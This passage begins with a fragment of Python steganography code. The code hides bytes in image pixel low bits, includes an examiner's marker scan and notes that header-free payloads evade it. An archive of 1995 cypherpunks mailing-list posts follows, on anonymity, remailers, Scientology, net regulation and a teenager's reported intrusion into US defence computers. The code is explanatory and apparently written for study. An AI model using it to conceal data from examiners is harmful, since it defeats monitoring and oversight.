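    """Return a copy of pixels with payload written into the low-order bit
    of consecutive pixel values, starting at pixel index `offset`."""
    bits = to_bits(payload)
    if offset < 0 or offset + len(bits) > len(pixels):
        raise ValueError("cover image too small for payload at this offset")
    stego = list(pixels)
    for i, bit in enumerate(bits):
        stego[offset + i] = (stego[offset + i] & 0xFE) | bit
    return stego


def extract(pixels, offset, nbytes):
    """Read nbytes back out of the low-order bits starting at `offset`."""
    return from_bits([p & 1 for p in pixels[offset:offset + 8 * nbytes]])


def find_marker(pixels, marker=ARMOR_HEADER):
    """Examiner's check: scan the low-order bit plane for a known byte
    string at ANY bit position. Returns the pixel index or -1."""
    plane = bytes(p & 1 for p in pixels)       # one 0/1 byte per pixel
    return plane.find(bytes(to_bits(marker)))  # needle in the same encoding


# --- constructed sample data (not taken from any real image or message) ---
rng = random.Random(1995)
COVER = [rng.randrange(256) for _ in range(4096)]   # 8-bit pixel values
ARMORED = ARMOR_HEADER + b"\nVersion: 2.6.2\n\n" + b"(constructed body)\n"
KEY_ID = bytes.fromhex("0123456789abcdef")          # constructed 64-bit key ID
STEALTH = bytes(rng.randrange(256) for _ in range(64))  # stands in for
                                                        # header-free ciphertext

if __name__ == "__main__":
    with_header = embed(COVER, ARMORED, offset=777)
    print("largest pixel change:",
          max(abs(a - b) for a, b in zip(COVER, with_header)))
    print("clean cover        ->", find_marker(COVER))
    print("armored payload    ->", find_marker(with_header))
    print("header-free payload ->", find_marker(embed(COVER, STEALTH, 777)))
    tagged = embed(COVER, KEY_ID + STEALTH, offset=100)
    print("known key ID       ->", find_marker(tagged, KEY_ID))
```

[The scan needs no statistics and no knowledge of where the payload starts: a fixed header or a known key ID gives the examiner an exact-match test, which is why the header-free form is the only one the search misses.]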




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sat, 7 Jan 95 04:24:43 PST
To: cypherpunks@toad.com
Subject: Information highways, oceans and islands
Message-ID: <gate.sT8Dyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



Electric Dreams #42 examines the notion of distance in and out of cyberspace,
and debunks the information highway as a metaphor. Send a blank message with
a command in the Subject: line of the header, for more info. 'get dreams-42'
(without quotes) for a copy of the article; 'get index' for an index of those
so far; and 'subscribe' to receive 5 kbytes every week.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gnu
Date: Wed, 4 Jan 95 02:37:13 PST
To: gnu@toad.com
Subject: Re: Cloak and Gown
In-Reply-To: <9501040525.AA10625@anchor.ho.att.com>
Message-ID: <9501041037.AA11018@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Another book with some insight into Bletchley Park is
> "Cloak and Gown" (I forget the author),

"Use the source, Luke!"

% telnet locis.loc.gov

         L O C I S :  LIBRARY OF CONGRESS INFORMATION SYSTEM

          To make a choice: type a number, then press ENTER


  1   Library of Congress Catalog           4   Braille and Audio

  2   Federal Legislation                   5   Organizations

  3   Copyright Information                 6   Foreign Law

...

b cloak and gown
To choose from list, see examples at bottom.                      FILE: LOCI
Terms alphabetically close to:CLOAK AND GOWN

B01 Cloak & gown//(TITL=3)
B02 Cloak and dagger//(TITL=3)
B03 Cloak and dagger fiction//(TITL=2)
B04 Cloak and Dagger in Predator and Prey//(TITL=1)
B05 Cloak and gavel//(TITL=1)
B06+Cloak and gown//(TITL=3)
B07 Cloak for the dreamer//(TITL=1)
B08 Cloak of Aesir//(TITL=1)
B09 Cloak of competence//(TITL=1)
B10 Cloak of consciousness//(TITL=1)
B11 Cloak of darkness//(TITL=2)
B12 Cloak of friendship//(TITL=1)

---EXAMPLES: s b6         (SELECTs line b6; creates a SET for each term type)
             f b6-b8/b10  (FINDs b6-b8 and b10; combines sets, displays result)
             r b6         (RETRIEVEs term on b6; searches text in some files)
             r subj=b6    (RETRIEVEs term type specified; e.g., SUBJ, TITL)

f b1/b6

ITEMS 1-3 OF 3                 SET 3: BRIEF DISPLAY                FILE: LOCI
                                (DESCENDING ORDER)
1. 88-672288: Winks, Robin W.  Cloak and gown : scholars in America's secret
     war /  London : Collins Harvill, 1987.  607 p. ; 24 cm.
     NOT IN LC COLLECTION
2. 88-30560: Winks, Robin W.  Cloak & gown : scholars in the secret war,
     1939-1961 /  New York : Quill, 1988.  p. cm.
     CIP - NOT YET IN LC
3. 87-7683: Winks, Robin W.  Cloak & gown : scholars in the secret war,
     1939-1961 /  1st ed.  New York : Morrow, c1987.  607 p., [16] p. of
     plates : ill., ports. ; 25 cm.
     LC CALL NUMBER: JK468.I6 W48 1987





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: db@Tadpole.COM (Doug Barnes)
Date: Wed, 4 Jan 95 06:26:22 PST
To: raph@netcom.com (Raph Levien)
Subject: Re: Siegel and Lewis
In-Reply-To: <199501040022.QAA21291@netcom17.netcom.com>
Message-ID: <9501041424.AA25564@tadpole.tadpole.com>
MIME-Version: 1.0
Content-Type: text/plain



Why is it that so many cypherpunks like The Economist?

I learned recently that Eric is a big fan. So am I. You're certainly 
not the first other cypherpunk to mention this. Weird. I mean, it's
not exactly a radical publication... it just gets its *&#$*#$ facts
right. Probably this is it.

Doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Wed, 4 Jan 95 06:09:12 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Siegel and Lewis
In-Reply-To: <Pine.SV4.3.91.950103221946.23162A-100000@xcalibur>
Message-ID: <Pine.3.89.9501040854.A3895-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Jonathan Cooper wrote:

> >    Martha Siegel is just fucked up enough that she will probably push
> > for legislation regulating the nets. Congress is just fucked up that
> > they might pass it.
> 
>    And if they do I will make it a definite point to do all I can to 
> emigrate to the UK, the Netherlands, or somewhere else.
> 
>    This country is increasingly becoming a police state, and I've got too 
> many years of life left to just passively deal with it.

uhm Jon, it seems that emigrating would be passively dealing with it, 
kinda contradicting your statement that you're too young to just 
passively deal with it.


i want to know everything          http://www.mcs.com/~nesta/home.html
i want to be everywhere                     Nesta's Home Page        
i want to fuck everyone in the world               &
i want to do something that matters         /-/ a s t e zine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bmorris@netcom.com (Bob MorrisG)
Date: Wed, 4 Jan 95 08:52:49 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
In-Reply-To: <Pine.NXT.3.91.950103080014.28792B-100000@kisa>
Message-ID: <199501041652.IAA22982@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


BL>  I don't see why a debit card couldn't be anonymous

BL> Why should a bank care who you are once they have
BL> your money in the account.

The bank might not care.  The IRS probably does and would insist on
knowing about transfers from bank accounts to anon debit cards.

BL> you don't lose the card how can someone use your account?

Just like with real cash.  Possession is ownership.  Digital cash
involves crypto and, I assume, some type of personal ID?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@bear.com
Date: Wed, 4 Jan 95 06:03:44 PST
To: cypherpunks@toad.com
Subject: Re: Press attack on anonymity.
Message-ID: <9501041402.AA07682@yeti.bsnet>
MIME-Version: 1.0
Content-Type: text/plain


> From: <koontz@maspar.com>
> 
> Sandy Sandfort posted an editorial from the Monday's SF Chronicle.
> 
> There is a front page story in today's San Jose Mercury News on why
> anonymity is a bad thing.
> 
> It's from a New York Times story by Peter H. Lewis
> 
> The question is who launched all this stuff?

Funny thing is, _I_ just wrote a long piece on anon remailers too, though
it was obviously from a different perspective from Peter Lewis's (and a lot
better written, natch).  The local paper it was written for liked it, but
thought the subject matter was "too technical" for its readership, so I'm
hoping to get it published elsewhere.  When I got the idea, all I could
think of was why no one else had done a piece specifically on remailers.
It's an important story.  I guess everyone else was working on them at the
same time.

I hope that there are some good pro-anonymity pieces published soon to give
some "balance."

P.S.: Martha S. Siegel is absolutely out of her mind.  If she wasn't
lynched after the green card episode, this latest stunt should do it.

   --Dave.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@bear.com
Date: Wed, 4 Jan 95 06:18:02 PST
To: cypherpunks@toad.com
Subject: Re: Siegel and Lewis
Message-ID: <9501041417.AA08643@yeti.bsnet>
MIME-Version: 1.0
Content-Type: text/plain


> From: <raph@netcom.com>
> 
>    I just got off the phone with Peter Lewis, reporter for the New
> York Times. He is unaware of any grand conspiracy to regulate the Net,
> but then again if there was one, I don't think they'd tell him.
> 
>    His piece that ran Saturday was badly mangled by the editorial
> process, especially since it ran on page one. Those articles get to be
> mangled by a whole new set of people who otherwise wouldn't get to
> touch it. I think Lewis has basically good intentions, and does do his
> homework before writing a story.

I have a good friend who writes for the Times.  Last time I spoke to
him, he was frantically trying to get in touch with the Business editor
because a piece he'd just written had been hacked to bits, with several
inaccuracies introduced.  He probably couldn't reach the guy, and I bet
the mutilated version got printed (I don't know for sure, since I don't
read the Times).  This is standard.

It's almost a rule that whenever there's a story on a subject you're
familiar with there'll be major inaccuracies.  So what does that say
about all the others?

>    Yecchh. Now I know why I don't rely on daily newspapers for my news

Well, that's one reason, anyway...

   --Dave.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 4 Jan 95 06:39:58 PST
To: raph@netcom.com (Raph Levien)
Subject: Re: Siegel and Lewis
In-Reply-To: <199501040022.QAA21291@netcom17.netcom.com>
Message-ID: <9501041431.AA14688@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Raph Levien says:
>    I just got off the phone with Peter Lewis, reporter for the New
> York Times. He is unaware of any grand conspiracy to regulate the Net,
> but then again if there was one, I don't think they'd tell him.

I doubt that there is one.

>    Martha Siegel is just fucked up enough that she will probably push
> for legislation regulating the nets. Congress is just fucked up that
> they might pass it.

Peter should take some responsibility for perpetuating Mr. Canter and
Ms. Siegel. He failed, in my opinion, to properly reflect the
situation in his articles about it in The Times. In particular, he did
very little to convey that the two are de facto disbarred attorneys who
had played the same games in "real space" that they had in Cyberspace
and had been dragged through the coals by the Florida bar association
for it because to almost anyone what they had been doing was a gross
ethical violation.

He also made it seem as though internet users were opposed to
advertising, when, of course, advertising has been on the net for many
many years, and newsgroups like comp.newprod exist to publish nothing
but ads. He didn't properly convey that the defect in their behavior
had been the jamming of other people's communications with their ads,
rather than the act of advertising per se -- much like someone
standing up during a town meeting on some local matter and starting to
declaim loudly not on the purpose of the meeting but instead about how
great their legal services were.

Peter also did little to interview anyone with substantial standing in
the internet community about what C&S were doing -- a quote or two
from an old net hand like a Gene Spafford or someone of that ilk might
have been valuable. As it was, he didn't produce much to counter the
viewpoint that they were the victims rather than the victimizers.

I think it is only because the "paper of record" published articles
that made them look like their point of view had any merit at all that
they managed to survive this long. As it is, the Tennessee Bar is
looking in to whether they have committed any new ethical
violations. I'd say, of course, that they had...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 4 Jan 95 06:45:31 PST
To: cypherpunks@toad.com
Subject: Re: San Francisco Editorial
In-Reply-To: <199501032244.OAA15281@jobe.shell.portal.com>
Message-ID: <Qj2fAKT0Eyt5BUJxh8@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


A letter to the editor is like spitting into the wind in this case.   I
think what's needed is a more constructive affirmative action, ideally
taking Canter and Siegel to court somewhere.

I know that there was an FCC ruling in 1993 that has saved me LOADS of
annoyance from telephone sales calls, because now if you get such a call
and you formally request to be taken off their dialing lists, you can
actually SUE them if they call you again.  As a result, they now tend to
take you very seriously when you make such a request in a knowledgeable
fashion.  Does anyone know if there might be a similar legal case to be
made against net spammers who persist after being warned?  I suspect
that it's easy to make such a case for email spamming, but probably not
for spamming of unmoderated newsgroups.

Note that I speak entirely for myself here, not for my employers.  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Octavian  Ureche <tavi@info.polymtl.ca>
Date: Wed, 4 Jan 95 06:41:39 PST
To: cypherpunks@toad.com
Subject: Re: 16 years old hacker arrested ?
Message-ID: <199501041442.AA20561@von-neumann.info.polymtl.ca>
MIME-Version: 1.0
Content-Type: text/plain


> According to AFP(London), The Independent reported on January 3, 1995
> that a sixteen years old boy was arrested for breaking into the 
> computer network of US Defense Department.
> 
> The report also tells that the hacker posted documents about last
> year's nuclear crisis between North Korea and USA.
> 
> Does anyone know where can I get a copy of that documents ?
> 

This is a repost from another list:

---------------------------------------------------------
   
   TEEN-AGE HACKER TAPS INTO U.S. DEFENSE SECRETS 
  
   From wire reports
   
   LONDON - A British teen-ager allegedly hacked into sensitive U.S.
   government computers and was able to monitor secret communications
   over the North Korean nuclear crisis last spring, the Independent
   newspaper reported Tuesday.
   
   The boy tapped into several defense computers for seven months in what
   U.S. officials conceded was one of the most serious breaches of
   computer security in recent years, the paper said.
   
   The 16-year-old, after reading the messages, put them on a bulletin
   board on the Internet, an international computer network accessible to
   35 million users.
   
   A British hacker who read the messages told the Independent they
   contained information about firing sites in North Korea and field
   intelligence.
   
   "He kept detailed logs of communication traffic. He really couldn't
   believe his luck. The Americans thought he was a spy but he told them
   he was just doing it for fun," the hacker told the Independent.
   
   The boy, nicknamed "Datastream" by other Internet users, was finally
   caught by special U.S. investigators because he left his terminal
   on-line to a U.S. defense computer overnight.
   
   British police arrested the boy in July and prosecutors are expected
   to decide this month whether he can be charged, the Independent said.
   
   In a statement to the paper, the U.S. Air Force Office of Special
   Investigations acknowledged the hacker could have accessed and read
   the Korean files.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Dalai Lama <dan@chopin.udel.edu>
Date: Wed, 4 Jan 95 06:59:35 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
In-Reply-To: <9501040637.AA11348@anchor.ho.att.com>
Message-ID: <Pine.SOL.3.91.950104095816.28473A-100000@chopin.udel.edu>
MIME-Version: 1.0
Content-Type: text/plain



I know that in Delaware it is illegal for a merchant to request ID when 
you pay by credit card.  I'm not sure if this is widespread or just 
local. 

-- [Here's something for those friendly mail scanners...]
hack phreak crack assassinate president virus espionage clinton honduras
root RSA LSD-25 plutonium north korea terrorist encryption die NSA CERT quiche

> The standard merchant contract with Visa/Mastercharge used to forbid
> merchants from asking for additional ID unless they suspected fraud;
> I think some states have made laws about this as well.
> 
> 	Bill
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Wed, 4 Jan 95 07:14:10 PST
To: cypherpunks@toad.com
Subject: Regulatory Risks
Message-ID: <199501041514.AA02778@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


So if the feds intend to regulate cyberspace, what specific sorts of
regulations are possible at this point?

Forget laws, what is *technically* and institutionally feasible?

Can they just throw out TCP/IP and mandate X25?  Can TCP/IP be "tamed?"  How
can they control private virtual networks that piggyback on the basic
network structure?  

Just questions.  No answers.

DCF
*************************************************************************
ATMs, Contracting Out,  Digital Switching, Downsizing, EDI, Fax, Fedex,
Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone 
Cards, Quants, Securitization, Temping, Voice Mail.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 4 Jan 95 10:38:47 PST
To: "David G. Koontz" <koontz@MasPar.COM>
Subject: Re: Press attack on anonymity.
In-Reply-To: <9501032146.AA19980@argosy.MasPar.COM>
Message-ID: <Pine.3.89.9501041054.A10000-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, David G. Koontz wrote:
> The question is who launched all this stuff?

When the government -- or some rogue government department wishing
to expand its role and authority -- wishes to launch a new,
and possibly unpopular, act of coercion, they normally find
some interest group that might be advantaged by that act
of coercion, and boost them up.

Assume the objective is to make the famous information
superhighway into an imitation of Plodigy and existing
media -- in other words ensure that it is dominated
by few to many communications, and that many to many
communications are censored.

The obvious interest group is those who wish to advertise
on the internet as if it was a normal few to many medium.

This assumption makes predictions consistent with 
what we observe.

I am not unduly worried.   Canter and Siegel is not 
a significant interest group.  Furthermore the 
Republican party is at present in favor of many to many
communications because talk radio was a big factor
in their victory, and the internet was a major factor
in the defeat of Foley.

This is just a small time conspiracy by some ignorant
rogue government department, perhaps the NSA, that does 
not realize what they are confronting.

When the internet starts to have a serious impact on
government revenues, then I am going to worry.

In addition, many to many communications work primarily
against the Democrats primarily because they are so 
entrenched in power.  When the Republican party has
been in power a while, they will no longer be so
keen on many to many communication.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 4 Jan 95 11:06:45 PST
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Regulatory Risks
In-Reply-To: <199501041514.AA02778@panix.com>
Message-ID: <Pine.3.89.9501041009.A14363-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 4 Jan 1995, Duncan Frissell wrote:

> So if the feds intend to regulate cyberspace, what specific sorts of
> regulations are possible at this point?
> 
> Forget laws, what is *technically* and institutionally feasible?

Criminalize anonymity, and tell the internet providers to figure
out how to enforce it or face confiscation.

After that, they can get involved in the standards business to
ensure that when the current 32 bit internet address space
is upgraded, we go with a system where the technology 
supports centralized administration rather than anarchy.

They can do it -- but they probably will not.  Recent political
events mean that such actions can only be done on presidential
authority.   It will be impossible to obtain new law to enforce
such measures for at least four years.


There will be eventually a big confrontation between governments
and liberty in cyberspace -- but I doubt that this is it.

This one can be won with a few letters to the editor.


 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Wed, 4 Jan 95 11:08:49 PST
To: cypherpunks@toad.com
Subject: Re: Warning letter from Co$. [any comments ?]
In-Reply-To: <199501041600.AA07488@xs1.xs4all.nl>
Message-ID: <199501041907.LAA06127@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> nobody@replay.com (Name withheld on request) writes:
> FROM:  THOMAS M. SMALL
> COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE
> PUBLICATIONS, INC.

While the issue is interesting (using anonymous mailers to violate
copyrights or to expose scams, depending on your view of the content),
the apparent aim of the Scientologists isn't met by approaching the
cypherpunk remailers: the specific anonymous postings have been through
penet so far, I think.

> Recent   proposed   legislation   regarding    potential
> liability   of  systems  operators  and  others  who  provide
> facilities or services, such  as  annonymous  remailers,  for
> information  passing through their systems has understandably
> created concern  on  the  part  of  systems  operators  as  a
> potential  liability.   We  ask  your voluntary assistance in

You missplet "anonymous".  Hope this helps.

The only "proposed legislation" I know of was proposed by Martha Siegel,
the greencard guru from CyberHell.  Any others?

> We  ask that you confirm that you have blocked access to
> these newsgroups through your remailer.  If you are unwilling
> to  do  so,  we  ask that you inform us as to the reasons for
> your position.

Yeah, right.  People unclear on the concept of anonymous remailers.
Maybe they should be talking to the mail-to-news forwarders instead.

	Jim Gillogly
	Highday, 13 Afteryule S.R. 1995, 19:06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 4 Jan 95 11:13:46 PST
To: Cypherpunks@toad.com
Subject: Anonymity and talk.politics.chinal
Message-ID: <Pine.3.89.9501041158.A14363-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


Many of the messages in talk.politics.china are anonymous.

They use anon.penet.fi

Many of these messages are in Chinese, not ASCII.

This is an obvious example of legitimate use of anonymity.

In addition this example makes an association in people's minds
between suppressing anonymity, and discouraging dissent.




 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Wed, 4 Jan 95 11:38:33 PST
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: San Francisco Editorial
In-Reply-To: <Qj2fAKT0Eyt5BUJxh8@nsb.fv.com>
Message-ID: <Pine.SUN.3.91.950104113626.11567D-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


"A letter to the editor is like spitting into the wind", you say.  

Well, yeah...but with enough spit, the wind may change.  So everyone 
should write letters to the editor....and make copies for your 
congressman while you're at it.  This is absolutely the most effective 
action you can take for 64 cents.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sghahn@math1.kaist.ac.kr (han@joe.math.uga.edu)
Date: Tue, 3 Jan 95 19:15:44 PST
To: cypherpunks@toad.com
Subject: 16 years old hacker arrested ?
Message-ID: <9501040310.AA04088@math1.kaist.ac.kr>
MIME-Version: 1.0
Content-Type: text/plain



According to AFP (London), The Independent reported on January 3, 1995
that a sixteen-year-old boy was arrested for breaking into the 
computer network of the US Defense Department.

The report also says that the hacker posted documents about last
year's nuclear crisis between North Korea and the USA.

Does anyone know where I can get a copy of those documents?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Wed, 4 Jan 95 09:30:06 PST
To: perry@imsi.com
Subject: Re: Siegel and Lewis
Message-ID: <199501041728.AA27110@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



>
>Peter also did little to interview anyone with substantial standing in
>the internet community about what C&S were doing -- a quote or two
>from an old net hand like a Gene Spafford or someone of that ilk might
>have been valuable. As it was, he didn't produce much to counter the
>viewpoint that they were the victims rather than the victimizers.

Geez, thanks. He quoted me in an article on the C&S problem long ago. 
I had a legitimate beef because my service provider dutifully kept
many empty newsgroups around just in case someone discovered them.
C&S did and I literally spent 2 hours unsubscribing from all of them.
I seem to remember that he quoted me as being really inconvenienced,
which is pretty much what happened to everyone else. 
>
>I think it is only because the "paper of record" published articles
>that made them look like their point of view had any merit at all that
>they managed to survive this long. As it is, the Tennessee Bar is
>looking in to whether they have committed any new ethical
>violations. I'd say, of course, that they had...

You are correct, though, about this. They seem to draw much more 
unsuspicious attention than a pair of disbarred attorneys should
get. Of course, all attorneys deserve caution and suspicion. 
>
>Perry






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 4 Jan 95 09:50:48 PST
To: cypherpunks@toad.com
Subject: Re: Warning letter from Co$. [any comments ?]
Message-ID: <v01510100ab308e357e7d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:00 PM 1/4/95, Name withheld on request wrote:

<A laughable pseudo-legal screed from a church started on a bet in a bar.>

This may be interesting. Practically the entire revenue stream for the
"Church" of "Scientology" comes from "sales" of this "literature".  If
someone publishes it on the internet anonymously, the revenue accounts of
the Co$ may become "Clear". Ahem.

Meanwhile, theology and philosophy departments everywhere are fighting for
funding to put most of the legitimate canon in their fields on the net for
free...

>                                             Thomas M. Small
                                                        ^^^^^
Cheers,
Bob R. Nott
       ^^^^

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 4 Jan 95 13:10:13 PST
To: cypherpunks@toad.com
Subject: who?
Message-ID: <199501042110.NAA27459@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


 does anybody know what the email address is for the good samaritans?

tia

 ps, how come mail i send to jpiunix.com is getting bounced, are they down?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Wed, 4 Jan 95 10:36:29 PST
To: cypherpunks@toad.com
Subject: British Hacker Article
Message-ID: <199501041831.AA22005@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


From The Independent (London) Tuesday 3 January 1995 - Front Page

[Banner Headlines]

BRITISH BOY `RAIDED US DEFENCE SECRETS'

by Tim Kelsey

A 16-year-old Briton allegedly hacked into some of the US government's most
sensitive computers and was able to watch secret communications between US
agents in North Korea during the crisis over nuclear inspection last spring.
After reading them, he put them onto a bulletin board of the Internet, an
international computer network accessible by 35 million users.

_The_Independent_ has learnt that Scotland Yard has arrested the boy and has
sent a report to the Crown Prosecution Service.  Officers expect to be told
whether he can be charged this month.

In what US officials have conceded is one of the most serious breaches of
computer security in recent years, the boy accessed several defence
department systems for at least seven months without detection.  The systems
he obtained access to included those for ballistic weapons research, and
aircraft design, payroll, procurement, personnel records and electronic mail.

The boy, who was arrested in Tottenham, north London in July, was, according
to US officials, one of a number of people who broke into US defence
computers in the latter months of 1993 and the early months of 1994.  But it
is understood that he was responsible for most of the damage.  In all, more
than a million user passwords were compromised.  The US Defence Information
Systems Agency admitted in a private briefing, which has been confirmed,
that the hackers had affected the Department's "military readiness."

The boy was first detected in March 1994, and the Air Force Office of
Special Investigations (OSI) was appointed to investigate.  The OSI is a
special task force, based at Bolling Air Force Base in Washington DC.  It
mounts special "raids" on classified computer sites to test their security.
A spokesman said yesterday that the boy, who was nicknamed "Datastream" by
friends on the Internet, needed "more knowledge than the average home
computer owner would possess" to hack the computers.  It is understood that
he invented a "sniffer" programme which searched across hundreds of
computers attached to the Internet for passwords and user names.  He was
finally caught because he left his terminal on-line to a US defence computer
over night.

Another British hacker, aged 22, who is acquainted with "Datastream", read
some of the messages accessed by him.  "They contained information about
firing sites in North Korea and stuff like that.  Field intelligence.  He
kept detailed logs of communication traffic.  He really couldn't believe his
luck.  The Americans thought he was a spy but he told them he was just doing
it for fun."


The OSI said in a statement:  "It is unknown if any hacker actually read,
copied or took any other action with the Korean files or any other sensitive
data.  The Korean files were on the Girths Air Force Base computer system
and therefore they could have been accessed.  It is our opinion that the
hacker who accessed the Korean file system learned of its existence from a
bulletin board system or another hacker.  It is possible the hacker could
have read the Korean files."

Scotland Yard's Computer Crime Unit is able to prosecute the boy under the
terms of the Computer Misuse Act, which allows for crimes committed overseas
by Britons to be dealt with in UK courts.  A spokesman confirmed that a
report had been sent to the CPS.

The Internet, designed in the 1960s by US Defence engineers to enable them
to communicate quickly by computer, is now available to anyone who pays a
small fee.

---
Keyboarding by Lois Roth

*************************************************************************
ATMs, Contracting Out,  Digital Switching, Downsizing, EDI, Fax, Fedex,
Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone 
Cards, Quants, Securitization, Temping, Voice Mail.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 4 Jan 95 10:55:56 PST
To: Doug Barnes <db@Tadpole.COM>
Subject: Re: Siegel and Lewis
In-Reply-To: <9501041424.AA25564@tadpole.tadpole.com>
Message-ID: <Pine.SUN.3.91.950104135455.7622A-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 4 Jan 1995, Doug Barnes wrote:

> Date: Wed, 4 Jan 1995 07:42:57 -0600 (CST)
> From: Doug Barnes <db@Tadpole.COM>
> To: Raph Levien <raph@netcom.com>
> Cc: cypherpunks@toad.com
> Subject: Re: Siegel and Lewis
> 
> 
> Why is it that so many cypherpunks like the economist?
> 
> I learned recently that Eric is a big fan. So am I. You're certainly 
> not the first other cypherpunk to mention this. Weird. I mean, it's
> not exactly a radical publication... it just gets its *&#$*#$ facts
> right. Probably this is it.

I am also a fan.

I tend to focus on the subject matter the Economist prints.  I just find it 
more on target than most if not all of the major U.S. media sources.

> 
> Doug
> 
> 

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Wed, 4 Jan 95 13:59:06 PST
To: nobody@replay.com
Subject: Re:  Warning letter from Co$. [any comments ?]
Message-ID: <9501042201.AA29419@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


Other than the obvious, that electronic media hasn't been shown
to be covered by intellectual property, and that something that
has been placed in the public domain, rightly or wrongly isn't
confidential ...

Is this a hoax?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Wed, 4 Jan 95 11:41:13 PST
To: frissell@panix.com
Subject: Re:  Regulatory Risks
Message-ID: <9501041905.AA17682@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan asks
> So if the feds intend to regulate cyberspace, what specific sorts of
> regulations are possible at this point?
> Forget laws, what is *technically* and institutionally feasible?
> Can they just throw out TCP/IP and mandate X25?  Can TCP/IP be "tamed?" 
> How can they control private virtual networks that piggyback on the basic
> network structure?  

